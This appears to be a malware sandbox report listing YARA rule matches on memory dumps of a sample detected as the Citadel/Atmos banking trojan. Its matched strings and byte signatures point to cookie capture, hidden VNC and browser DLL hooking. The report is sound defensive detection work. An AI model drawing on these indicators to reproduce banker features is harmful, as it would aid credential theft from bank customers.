00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000006.00000000.1754241470.000000000C350000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000006.00000000.1754241470.000000000C350000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000006.00000000.1754241470.000000000C350000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000006.00000000.1754241470.000000000C350000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0000001A.00000000.2081513411.0000000000030000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000001A.00000000.2081513411.0000000000030000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000001A.00000000.2081513411.0000000000030000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000001A.00000000.2081513411.0000000000030000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 03 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 03 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 03 00
0000001A.00000000.2081513411.0000000000030000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AC 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 AC 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AC 00
00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000014.00000003.2029731721.0000000000A10000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000014.00000003.2029731721.0000000000A10000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000014.00000003.2029731721.0000000000A10000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000014.00000003.2029731721.0000000000A10000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 A1 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 A1 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 A1 00
00000014.00000003.2029731721.0000000000A10000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000028.00000000.2136239624.0000000002390000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000028.00000000.2136239624.0000000002390000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000028.00000000.2136239624.0000000002390000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000028.00000000.2136239624.0000000002390000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000000.00000000.1663958012.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x13339:$MZ: 4D 5A 0x148c7:$MZ: 4D 5A 0x3e4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e578:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
00000027.00000002.2972478515.0000000002B30000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000027.00000002.2972478515.0000000002B30000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000027.00000002.2972478515.0000000002B30000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000027.00000002.2972478515.0000000002B30000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000010.00000000.1965985487.0000000000580000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000010.00000000.1965985487.0000000000580000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000010.00000000.1965985487.0000000000580000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000010.00000000.1965985487.0000000000580000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 58 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 58 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 58 00
00000010.00000000.1965985487.0000000000580000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x120df:$MZ: 4D 5A 0x12227:$MZ: 4D 5A 0x1521d:$MZ: 4D 5A 0x1f494:$MZ: 4D 5A 0x1f4d4:$MZ: 4D 5A 0x3fa68:$MZ: 4D 5A 0x3e734:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 2F 00 57 33 DB BF 00 28 00 00 0x3e7d8:$b: 68 C8 00 00 00 FF 15 4C 12 2F 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f680:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f6a0:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e587:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 2F 00
00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x8fa8:$c: %BOTID% 0x8fb0:$d: %BOTNET% 0x90c4:$f: bc_remove 0x90d0:$g: bc_add 0x7dc8:$ggurl: http://www.google.com/webhp
00000025.00000002.2952993585.0000000000C90000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000025.00000002.2952993585.0000000000C90000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000025.00000002.2952993585.0000000000C90000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000025.00000002.2952993585.0000000000C90000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 C9 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 C9 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 C9 00
00000025.00000002.2952993585.0000000000C90000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000022.00000000.2115641562.0000000002400000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000022.00000000.2115641562.0000000002400000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000022.00000000.2115641562.0000000002400000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000022.00000000.2115641562.0000000002400000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0000001D.00000003.2100223475.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000001D.00000003.2100223475.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000001D.00000003.2100223475.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000001D.00000003.2100223475.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 EE 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 EE 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 EE 00
0000001D.00000003.2100223475.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000011.00000000.1981353060.00000000003D0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000011.00000000.1981353060.00000000003D0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000011.00000000.1981353060.00000000003D0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
